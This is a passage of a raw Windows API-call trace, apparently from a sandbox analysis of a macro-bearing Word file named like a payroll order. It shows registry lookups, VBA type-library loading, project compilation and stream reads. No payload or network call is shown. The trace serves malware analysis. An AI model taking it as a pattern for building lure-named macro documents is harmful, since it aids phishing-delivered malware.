[0044.919] _ultow_s (in: _Value=0x0, _Buffer=0x205860, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.919] RegOpenKeyW (in: hKey=0xa06, lpSubKey="0", phkResult=0x205838 | out: phkResult=0x205838*=0xa0a) returned 0x0 [0044.920] RegQueryValueW (in: hKey=0xa0a, lpSubKey="win64", lpData=0x205880, lpcbData=0x205834 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x205834) returned 0x0 [0044.920] wcscpy_s (in: _Destination=0x8060020, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0044.920] RegCloseKey (hKey=0xa0a) returned 0x0 [0044.920] RegCloseKey (hKey=0xa06) returned 0x0 [0044.921] RegCloseKey (hKey=0x9f2) returned 0x0 [0044.921] RegCloseKey (hKey=0x9ee) returned 0x0 [0044.921] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x205ea8*=0x0 | out: pptlib=0x205ea8*=0x7edffb0) returned 0x0 [0044.967] IUnknown:QueryInterface (in: This=0x7edffb0, riid=0x7fee4035c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ca8 | out: ppvObject=0x205ca8*=0x0) returned 0x80004002 [0044.967] ITypeLib:RemoteGetLibAttr (in: This=0x7edffb0, ppTLibAttr=0x205ca0, pDummy=0x10 | out: ppTLibAttr=0x205ca0, pDummy=0x10) returned 0x0 [0044.967] ITypeLib:RemoteGetDocumentation (in: This=0x7edffb0, index=-1, refPtrFlags=0x0, pbstrName=0x205c98, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x27a5106 | out: pbstrName=0x205c98*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x27a5106) returned 0x0 [0044.967] StringFromGUID2 (in: rguid=0x7e02810*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x205cc0, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0044.967] _ultow_s (in: _Value=0x2, _Buffer=0x205c0a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0044.967] _ultow_s (in: _Value=0x8, _Buffer=0x205c0e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0044.968] _ultow_s (in: _Value=0x0, _Buffer=0x205c12, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0044.968] wcscpy_s (in: _Destination=0x810c1e8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0044.968] wcscpy_s (in: _Destination=0x810c1ee, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0044.968] wcscpy_s (in: _Destination=0x810c23a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0044.968] wcscpy_s (in: _Destination=0x810c248, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0044.968] wcscpy_s (in: _Destination=0x810c2c8, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0044.968] ITypeLib:LocalReleaseTLibAttr (This=0x7edffb0) returned 0x0 [0044.968] wcscpy_s (in: _Destination=0x8060020, _SizeInWords=0x104, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0044.968] IMalloc:Realloc (This=0x7feff045380, pv=0x814ce60, cb=0xd00) returned 0x81d7230 [0044.968] wcscpy_s (in: _Destination=0x81d77a0, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0044.968] IMalloc:Free (This=0x7feff045380, pv=0x8060020) [0044.968] IUnknown:AddRef (This=0x7edffb0) returned 0x2 [0044.968] IUnknown:QueryInterface (in: This=0x7edffb0, riid=0x7fee40385a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205f08 | out: ppvObject=0x205f08*=0x0) returned 0x80004002 [0044.968] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="Office", lHashVal=0x107515, pfName=0x2060c0, pBstrLibName=0x205ff0 | out: pfName=0x2060c0*=0, pBstrLibName=0x205ff0) returned 0x0 [0044.968] IUnknown:Release (This=0x7edffb0) returned 0x1 [0044.968] IMalloc:Alloc (This=0x7feff045380, cb=0x3c) returned 0x7fc1f00 [0044.968] IMalloc:Free (This=0x7feff045380, pv=0x806f390) [0044.968] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff810 [0044.968] IMalloc:Realloc (This=0x7feff045380, pv=0x7dff810, cb=0x68) returned 0x806f390 [0044.968] IMalloc:Free (This=0x7feff045380, pv=0x7fc1f00) [0044.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Loi1", cchWideChar=5, lpMultiByteStr=0x206200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Loi1", lpUsedDefaultChar=0x0) returned 5 [0044.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loi1") returned 0x10b1ab [0044.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Loi1", cchWideChar=5, lpMultiByteStr=0x206340, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Loi1", lpUsedDefaultChar=0x0) returned 5 [0044.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loi1") returned 0x10b1ab [0044.970] IMalloc:Realloc (This=0x7feff045380, pv=0x80753d0, cb=0x8) returned 0x8188240 [0044.970] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811bc60 [0044.970] IMalloc:GetSize (This=0x7feff045380, pv=0x811bc60) returned 0x80 [0044.970] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26fee90 [0044.970] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26fef50 [0044.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Loi1", cchWideChar=5, lpMultiByteStr=0x206200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Loi1", lpUsedDefaultChar=0x0) returned 5 [0044.970] CoCreateGuid (in: pguid=0x205f30 | out: pguid=0x205f30*(Data1=0x7ad415ee, Data2=0xba70, Data3=0x4e31, Data4=([0]=0xa9, [1]=0xae, [2]=0x8f, [3]=0x6e, [4]=0x7f, [5]=0x62, [6]=0x78, [7]=0xd5))) returned 0x0 [0044.970] CoCreateGuid (in: pguid=0x205f40 | out: pguid=0x205f40*(Data1=0x70a3866e, Data2=0x5dd7, Data3=0x42df, Data4=([0]=0x87, [1]=0x3c, [2]=0x53, [3]=0x56, [4]=0xd3, [5]=0x58, [6]=0xe, [7]=0x54))) returned 0x0 [0044.970] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Loi1", cchWideChar=5, lpMultiByteStr=0x205f50, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Loi1", lpUsedDefaultChar=0x0) returned 5 [0044.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loi1") returned 0x10b1ab [0044.970] GetLocalTime (in: lpSystemTime=0x205e28 | out: lpSystemTime=0x205e28*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x2f0)) [0044.970] _ultow_s (in: _Value=0x5e399ea6, _Buffer=0x81d755c, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e399ea6") returned 0x0 [0044.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="015e399ea6", cchWideChar=11, lpMultiByteStr=0x205dc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="015e399ea6", lpUsedDefaultChar=0x0) returned 11 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x170) returned 0x819f9e0 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x50) returned 0x7f18010 [0044.971] strcpy_s (in: _Dst=0x7fd4c48, _DstSize=0x5, _Src="Loi1" | out: _Dst="Loi1") returned 0x0 [0044.971] IMalloc:Realloc (This=0x7feff045380, pv=0x80752d0, cb=0x68) returned 0x8070120 [0044.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loi1") returned 0x10b1ab [0044.971] wcscpy_s (in: _Destination=0x81d7570, _SizeInWords=0x5, _Source="Loi1" | out: _Destination="Loi1") returned 0x0 [0044.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loi1") returned 0x10b1ab [0044.971] wcscpy_s (in: _Destination=0x81d7580, _SizeInWords=0x5, _Source="Loi1" | out: _Destination="Loi1") returned 0x0 [0044.971] IMalloc:Realloc (This=0x7feff045380, pv=0x8075300, cb=0x12) returned 0x80051b0 [0044.971] IMalloc:Realloc (This=0x7feff045380, pv=0x8075240, cb=0x6) returned 0x8075300 [0044.971] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loi1") returned 0x10b1ab [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x48) returned 0x7fc1f00 [0044.971] IMalloc:Free (This=0x7feff045380, pv=0x806f390) [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff810 [0044.971] IMalloc:Realloc (This=0x7feff045380, pv=0x7dff810, cb=0x74) returned 0x810feb0 [0044.971] IMalloc:Free (This=0x7feff045380, pv=0x7fc1f00) [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x3d0) returned 0x814ce60 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff810 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8005230 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811bcf0 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075240 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80752d0 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x688) returned 0x815cbc0 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811bd80 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x640) returned 0x815d250 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff720 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80753d0 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188250 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff7b0 [0044.971] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811be10 [0044.972] IMalloc:Alloc (This=0x7feff045380, cb=0x400) returned 0x3ea2a90 [0044.972] IMalloc:Alloc (This=0x7feff045380, cb=0x400) returned 0x3ea2ea0 [0044.972] IMalloc:Alloc (This=0x7feff045380, cb=0x400) returned 0x3ea32b0 [0044.972] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0044.972] strcpy_s (in: _Dst=0x205f90, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0044.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205f90, cbMultiByte=10, lpWideCharStr=0x205de0, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0044.972] IUnknown:AddRef (This=0x7edf740) returned 0x3 [0044.972] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x205eb0, pBstrLibName=0x205de0 | out: pfName=0x205eb0*=0, pBstrLibName=0x205de0) returned 0x0 [0044.972] IUnknown:Release (This=0x7edf740) returned 0x2 [0044.972] IUnknown:AddRef (This=0x3dd7b80) returned 0x3 [0044.972] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x205eb0, pBstrLibName=0x205de0 | out: pfName=0x205eb0*=0, pBstrLibName=0x205de0) returned 0x0 [0044.972] IUnknown:Release (This=0x3dd7b80) returned 0x2 [0044.972] IUnknown:AddRef (This=0x7ee0550) returned 0x4 [0044.972] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x205eb0, pBstrLibName=0x205de0 | out: pfName=0x205eb0*=0, pBstrLibName=0x205de0) returned 0x0 [0044.972] IUnknown:Release (This=0x7ee0550) returned 0x3 [0044.972] IUnknown:AddRef (This=0x7edffb0) returned 0x2 [0044.972] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x205eb0, pBstrLibName=0x205de0 | out: pfName=0x205eb0*=1, pBstrLibName=0x205de0) returned 0x0 [0044.972] IUnknown:Release (This=0x7edffb0) returned 0x1 [0044.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_Evaluate", cchWideChar=-1, lpMultiByteStr=0x205f90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_Evaluate", lpUsedDefaultChar=0x0) returned 10 [0044.972] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0044.972] wcsncpy_s (in: _Destination=0x205fa0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0044.972] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0044.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x205ed0, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0044.972] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0044.972] CExposedDocFile::AddRef () returned 0x3 [0044.972] CExposedDocFile::AddRef () returned 0x4 [0044.972] CExposedDocFile::OpenStream () returned 0x0 [0044.973] CExposedDocFile::Release () returned 0x3 [0044.973] CExposedStream::Seek () returned 0x0 [0044.973] CExposedStream::AddRef () returned 0x2 [0044.973] CExposedStream::Read () returned 0x0 [0044.973] IMalloc:Alloc (This=0x7feff045380, cb=0x2028) returned 0x81d7f40 [0044.973] IMalloc:Alloc (This=0x7feff045380, cb=0x10020*=0x10128) returned 0x81d9f70 [0044.974] CExposedStream::AddRef () returned 0x3 [0044.974] CExposedStream::Release () returned 0x2 [0044.974] IMalloc:Alloc (This=0x7feff045380, cb=0x2ee0) returned 0x81e9fa0 [0044.975] IMalloc:Alloc (This=0x7feff045380, cb=0x800) returned 0x815d8a0 [0044.975] CExposedStream::Read () returned 0x0 [0044.975] CExposedStream::Read () returned 0x0 [0044.975] IMalloc:Alloc (This=0x7feff045380, cb=0x404) returned 0x3ea36c0 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x80", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x81", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x82", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x83", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x84", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x85", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x86", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x87", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.975] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x88", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x89", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8a", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8b", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8c", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8d", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8e", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8f", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x90", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x91", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x92", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x93", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x94", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x95", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x96", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x97", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x98", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x99", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9a", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9b", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9c", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9d", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9e", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9f", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa0", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa1", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa2", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa3", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa4", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa5", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa6", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa7", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa8", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.976] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa9", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xaa", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xab", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xac", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xad", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xae", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xaf", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb0", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb1", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb2", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb3", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb4", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb5", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb6", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb7", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb8", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb9", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xba", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbb", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbc", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbd", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbe", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbf", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc0", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc1", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc2", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc3", 